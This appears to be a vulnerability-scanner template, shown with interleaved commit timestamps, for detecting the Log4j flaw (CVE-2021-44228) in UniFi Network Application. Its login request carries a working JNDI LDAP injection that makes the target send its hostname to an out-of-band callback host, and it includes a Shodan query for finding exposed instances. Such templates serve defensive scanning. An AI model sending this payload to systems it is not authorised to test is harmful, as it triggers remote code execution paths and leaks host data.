2021-12-23 03:27:03 +00:00
id : unifi-network-log4j-rce
info :
2022-06-03 19:12:31 +00:00
name : UniFi Network Application - Remote Code Execution (Log4j)
2021-12-23 03:27:03 +00:00
author : KrE80r
severity : critical
2022-06-03 19:12:31 +00:00
description : UniFi Network Application is susceptible to a critical vulnerability in Apache Log4j (CVE-2021-44228) that may allow for remote code execution in an impacted implementation.
2021-12-23 03:27:03 +00:00
reference :
- https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
- https://twitter.com/sprocket_ed/status/1473301038832701441
metadata :
shodan-query : http.title:"UniFi Network"
2022-06-03 19:12:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-77
2022-02-14 14:23:51 +00:00
tags : rce,log4j,ubnt,unifi,oast,jndi
2021-12-23 03:27:03 +00:00
requests :
- raw :
- |
POST /api/login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json; charset=utf-8
Origin : {{RootURL}}
Referer : {{RootURL}}/manage/account/login?redirect=%2Fmanage
{"username" : "user" , "password" : "pass" , "remember" : "${jndi:ldap://${hostName}.{{interactsh-url}}}" , "strict" : true }
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "dns" # Confirms the DNS Interaction
- type : regex
part : interactsh_request
regex :
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors :
- type : regex
part : interactsh_request
group : 1
regex :
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
2022-06-03 19:12:31 +00:00
# Enhanced by mp on 2022/06/03